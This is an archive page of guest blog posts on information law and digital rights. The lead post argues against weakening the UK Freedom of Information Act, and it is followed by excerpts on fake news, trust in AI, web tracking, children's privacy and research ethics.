Category Archives: Guest post

Steve Goodrich: FOI is under attack when it should be strengthened

stevegoodrichIn this guest post, Transparency International UK’s Steve Goodrich considers UK citizens’ right to access information, arguing that public money should be put towards examining how the Freedom of Information regime can be improved, not weakened

The right to access information held by the state, public officers and providers of state services is an essential part of a functioning democracy. It provides citizen-led checks and balances on concentrations of power, without which corruption would be allowed to thrive; allows citizens to make informed judgements about the efficacy of governments and elected representatives; and helps hold institutions and officials to account for their actions. It is, therefore, perplexing why the UK Government – with its welcome and newfound interest in tackling corruption – appears intent on watering down the Freedom of Information Act.

In July this year, Lord Hodges announced that the UK Government was establishing an ‘independent Commission’ to review whether the Act provided ‘safe space’ for Ministers and civil servants to develop and discuss policy. This might sound very well and reasonable – why shouldn’t a law be reviewed after it’s been in operation for a decade – however, the announcement missed out some important pieces of detail.

Firstly, there has already been post-legislative scrutiny of the Act. The Justice Select Committee did a thorough job back in 2012, which involved taking 140 pieces of written evidence and oral evidence from 37 witnesses during 7 evidence sessions. After talking to a range of individuals and organisations, the Committee concluded that there are sufficient protections for deliberation within public bodies. The Information Commissioner and Information Tribunal are both mindful of the need to ensure this ‘safe space’ exists – which is already provided for in the Act – and Cabinet minutes are not routinely outed. Considering this, it’s slightly baffling why the government wants this looking at again, and so soon after the last review.

Secondly, one of the reasons cited for re-examining the Act is the Supreme Court’s recent decision in the case of the Prince Charles ‘spider memos’. After the Upper Tribunal had ordered the government to disclose these documents the Attorney General, Dominic Grieve, tried to issue the Ministerial veto – something intended for rare and limited circumstances. However, on appeal the Supreme Court ruled that the veto could not apply because it was never intended to be an executive override for a judgment of the judiciary. As the Supreme Court’s judgment notes, it is a long-standing principle of the rule of law that the executive should only be allowed to do this in very specific circumstances where the power to do so is clear and explicit. This is not the case within the FOI Act.

Essentially, the review seems to be partly inspired by sour grapes. The government lost in a disagreement with the courts and its solution is to make the case for re-writing the law so it can ignore them in the future when it suits them. The public interest is noticeably absent from its motivations.

Thirdly, the composition and conduct of the Commission has raised some eyebrows. Members include Jack Straw, who has publicly criticised the Act, and Michael Howard whose expenses for gardening services were revealed through FOI. There are no major advocates of the Act on the panel.

The Commission has also adopted some opaque practices during the initial stages of its inquiry, including providing anonymous briefings to members of the press and considering anonymising evidence. Until civil society expressed concerns about the Commission in September, it wasn’t even planning to take external evidence and had the suspiciously ambitious deadline of November 2015 to report to government. Since then, it has opened itself up to submissions and its deadline for reporting appears to have disappeared. However, the damage has already been done – Transparency International UK has no confidence in the impartiality and independence of the Commission.

The saddest thing about this whole episode is that it’s been a missed opportunity. If public money is going to be spent on reviewing the Act it should be put towards examining how it can be improved, not weakened. For example, there are growing transparency gaps in our public institutions, with the private sector providing an increasing amount of goods and services. Although there are some circumstances where these companies can be subject to information requests, these are limited. This is why the Act should be extended to the private sector where they are providing public services.

Recently, Labour has announced that it intends to set-up its own Commission on FOI that will look at the Act as a whole, including how it can be strengthened. This is a welcome development. However, as with the government’s Commission, its members and their actions must gain the confidence of civil society and government if its findings are ever to be realised.

Steve Goodrich is  Transparency International UK’s (TI-UK) Senior Research Officer. He is responsible for leading on TI-UK’s research into lobbying open data and state accountability. He spoke at ‘Freedom of Information: Extending Transparency to the Private Sector‘ on 28 September 2015, an event co-organised by the Bingham Centre for the Rule of Law and the IALS Information Law and Policy Centre.

  • For other resources on FOI and the private sector please follow this link
  • Our blog posts give the view of the author, and do not represent the position of the Information Law and Policy Centre or the Institute of Advanced Legal Studies.

British government’s new ‘anti-fake news’ unit has been tried before – and it got out of hand

File 20180125 107940 14x31mj.jpg?ixlib=rb 1.1
 

In this guest post, Dan Lomas, Programme Leader, MA Intelligence and Security Studies, University of Salford, explores the British government’s new ‘anti-fake news’ unit.

The decision to set up a new National Security Communications Unit to counter the growth of “fake news” is not the first time the UK government has devoted resources to exploit the defensive and offensive capabilities of information. A similar thing was tried in the Cold War era, with mixed results.

The planned unit has emerged as part of a wider review of defence capabilities. It will reportedly be dedicated to “combating disinformation by state actors and others” and was agreed at a meeting of the National Security Council (NSC).

As a spokesperson for UK prime minister Theresa May told journalists:

We are living in an era of fake news and competing narratives. The government will respond with more and better use of national security communications to tackle these interconnected, complex challenges.

 

Continue reading

AI trust and AI fears: A media debate that could divide society

File 20180109 83547 1gya2pg.jpg?ixlib=rb 1.1

In this guest post, Dr Vyacheslav Polonski, Researcher, University of Oxford examines the key question of trust or fear of AI.

We are at a tipping point of a new digital divide. While some embrace AI, many people will always prefer human experts even when they’re wrong.

Unless you live under a rock, you probably have been inundated with recent news on machine learning and artificial intelligence (AI). With all the recent breakthroughs, it almost seems like AI can already predict the future. Police forces are using it to map when and where crime is likely to occur. Doctors can use it to predict when a patient is most likely to have a heart attack or stroke. Researchers are even trying to give AI imagination so it can plan for unexpected consequences.

Of course, many decisions in our lives require a good forecast, and AI agents are almost always better at forecasting than their human counterparts. Yet for all these technological advances, we still seem to deeply lack confidence in AI predictions. Recent cases show that people don’t like relying on AI and prefer to trust human experts, even if these experts are wrong.

If we want AI to really benefit people, we need to find a way to get people to trust it. To do that, we need to understand why people are so reluctant to trust AI in the first place.

Continue reading

A Prediction about Predictions

In this guest post, Marion Oswald offers her homage to Yes Minister and, in that tradition, smuggles in some pertinent observations on AI fears. This post first appeared on the SCL website’s Blog as part of Laurence Eastham’s Predictions 2018 series. It is also appearing in Computers & Law, December/January issue.

Continue reading

How websites watch your every move and ignore privacy settings

File 20171122 6055 jrvkjw.jpg?ixlib=rb 1.1

In this guest post, Yijun Yu, Senior Lecturer, Department of Computing and Communications, The Open University examines the world’s top websites and their routine tracking of a user’s every keystroke, mouse movement and input into a web form – even if it’s later deleted.

Hundreds of the world’s top websites routinely track a user’s every keystroke, mouse movement and input into a web form – even before it’s submitted or later abandoned, according to the results of a study from researchers at Princeton University.

And there’s a nasty side-effect: personal identifiable data, such as medical information, passwords and credit card details, could be revealed when users surf the web – without them knowing that companies are monitoring their browsing behaviour. It’s a situation that should alarm anyone who cares about their privacy.

The Princeton researchers found it was difficult to redact personally identifiable information from browsing behaviour records – even, in some instances, when users have switched on privacy settings such as Do Not Track.

Continue reading

Who’s responsible for what happens on Facebook? Analysis of a new ECJ opinion

In this guest post Lorna Woods, Professor of Internet Law at the University of Essex, provides an analysis on the new ECJ opinion . This post first appeared on the blog of Steve Peers, Professor of EU, Human Rights and World Trade Law at the University of Essex.

Who is responsible for data protection law compliance on Facebook fan sites? That issue is analysed in a recent opinion of an ECJ Advocate-General, in the case of Wirtschaftsakademie (full title: Unabhängiges Landeszentrum für Datenschutz Schleswig-Holstein v Wirtschaftsakademie Schleswig-Holstein GmbH, in the presence of Facebook Ireland Ltd, Vertreter des Bundesinteresses beim Bundesverwaltungsgericht).

This case is one more in a line of cases dealing specifically with the jurisdiction of national data protection supervisory authorities, a line of reasoning which seems to operate separately from the Brussels I Recast Regulation, which concerns jurisdiction of courts over civil and commercial disputes.  While this is an Advocate-General’s opinion, and therefore not binding on the Court, if followed by the Court it would consolidates the Court’s prior broad interpretation of the Data Protection Directive.  While this might be the headline, it is worth considering a perhaps overlooked element of the data-economy: the role of the content provider in providing individuals whose data is harvested.

Continue reading

Guilty until proven innocent? How a legal loophole is being used to name and shame children

File 20171026 13319 1cvf3uw.jpg?ixlib=rb 1.1

 

 

 

 

 

 

 

 

 

In this guest post, Faith Gordon, University of Westminster explores how, under UK law, a child’s anonimity is not entirely guaranteed. Faith is speaking at the  Information Law and Policy Centre’s annual conference – Children and Digital Rights: Regulating Freedoms and Safeguards this Friday, 17 November. 

Under the 1948 Universal Declaration of Human Rights, each individual is presumed innocent until proven guilty. A big part of protecting this principle is guaranteeing that public opinion is not biased against someone that is about to be tried in the courts. In this situation, minors are particularly vulnerable and need all the protection that can be legally offered. So when you read stories about cases involving children, it’s often accompanied with the line that the accused cannot be named for legal reasons.

However, a loophole exists: a minor can be named before being formally charged. And as we all know in this digital age, being named comes with consequences – details or images shared of the child are permanent. While the right to be forgotten is the strongest for children within the Data Protection Bill, children and young people know that when their images and posts are screenshot they have little or no control over how they are used and who has access to them.

Continue reading

Ethical issues in research using datasets of illicit origin

In this guest post Dr Daniel R. Thomas, University of Cambridge reviews research surrounding ethical issues in research using datasets of illicit origin. This post first appeared on “Light Blue Touchpaper” weblog written by researchers in the Security Group at the University of Cambridge Computer Laboratory.

On Friday at IMC I presented our paper “Ethical issues in research using datasets of illicit origin” by Daniel R. Thomas, Sergio Pastrana, Alice Hutchings, Richard Clayton, and Alastair R. Beresford. We conducted this research after thinking about some of these issues in the context of our previous work on UDP reflection DDoS attacks.

Data of illicit origin is data obtained by illicit means such as exploiting a vulnerability or unauthorized disclosure, in our previous work this was leaked databases from booter services. We analysed existing guidance on ethics and papers that used data of illicit origin to see what issues researchers are encouraged to discuss and what issues they did discuss. We find wide variation in current practice. We encourage researchers using data of illicit origin to include an ethics section in their paper: to explain why the work was ethical so that the research community can learn from the work. At present in many cases positive benefits as well as potential harms of research, remain entirely unidentified. Few papers record explicit Research Ethics Board (REB) (aka IRB/Ethics Commitee) approval for the activity that is described and the justifications given for exemption from REB approval suggest deficiencies in the REB process. It is also important to focus on the “human participants” of research rather than the narrower “human subjects” definition as not all the humans that might be harmed by research are its direct subjects.

The paper and the slides are available.

Too much information? More than 80% of children have an online presence by the age of two

File 20170918 8264 1c771h6.jpg?ixlib=rb 1.1

In this guest post, Claire Bessant, Northumbria University, Newcastle, looks into the phenomenon of ‘sharenting’. Her article is relevant to the Information Law and Policy Centre’s annual conference coming up in November – Children and Digital Rights: Regulating Freedoms and Safeguards.

A toddler with birthday cake smeared across his face, grins delightedly at his mother. Minutes later, the image appears on Facebook. A not uncommon scenario – 42% of UK parents share photos of their children online with half of these parents sharing photos at least once a month.

Welcome to the world of “sharenting” – where more than 80% of children are said to have an online presence by the age of two. This is a world where the average parent shares almost 1,500 images of their child online before their fifth birthday.

But while a recent report from OFCOM confirms many parents do share images of their children online, the report also indicates that more than half (56%) of parents don’t. Most of these non-sharenting parents (87%) actively choose not to do so to protect their children’s private lives.

Continue reading

Has Facebook finally given up chasing teenagers? It’s complicated

File 20170811 13446 1iv9dp7

Facebook Watch.
Facebook

In this guest post, Harry T Dyer, University of East Anglia, looks into the complicated relationship between social media and young people. His article is relevant to the Information Law and Policy Centre’s annual conference coming up in November – Children and Digital Rights: Regulating Freedoms and Safeguards.

Facebook’s latest attempt to appeal to teens has quietly closed its doors. The social media platform’s Lifestage app (so unsuccessful that this is probably the first time you’ve heard of it) was launched a little under a year ago to resounding apathy and has struggled ever since.

Yet, as is Silicon Valley’s way, Facebook has rapidly followed the failure of one venture with the launch of another one by unveiling a new video streaming service. Facebook Watch will host series of live and pre-recorded short-form videos, including some original, professionally made content, in a move that will allow the platform to more directly compete with the likes of YouTube, Netflix and traditional TV channels.

Lifestage was just one of a long series of attempts by Facebook to stem the tide of young people increasingly interacting across multiple platforms. With Watch, the company seems to have changed tack from this focus on retaining young people, instead targeting a much wider user base. Perhaps Facebook has learnt that it will simply never be cool –, but that doesn’t mean it still can’t be popular.

Continue reading

Why the very idea of ‘screen time’ is muddled and misguided

In this guest post, Dr Natalia Kucirkova, UCL and Professor Sonia Livingstone, (London School of Economics and Political Science), explore ‘screen time’ as an outdated term and why we need to recognise the power of learning through  screen-based technologies. Their article is relevant to the Information Law and Policy Centre’s annual conference coming up in November – Children and Digital Rights: Regulating Freedoms and Safeguards.

The idea of “screen time” causes arguments – but not just between children and their anxious parents. The Children’s Commissioner for England, Anne Longfield, recently compared overuse of social media to junk food and urged parents to regulate screen time using her “Digital 5 A Day” campaign.

This prompted the former director of Britain’s electronic surveillance agency, GCHQ, to respond by telling parents to increase screen time for children so they can gain skills to “save the country”, since the UK is “desperately” short of engineers and computer scientists.

Meanwhile, parents are left in the middle, trying to make sense of it all.

Continue reading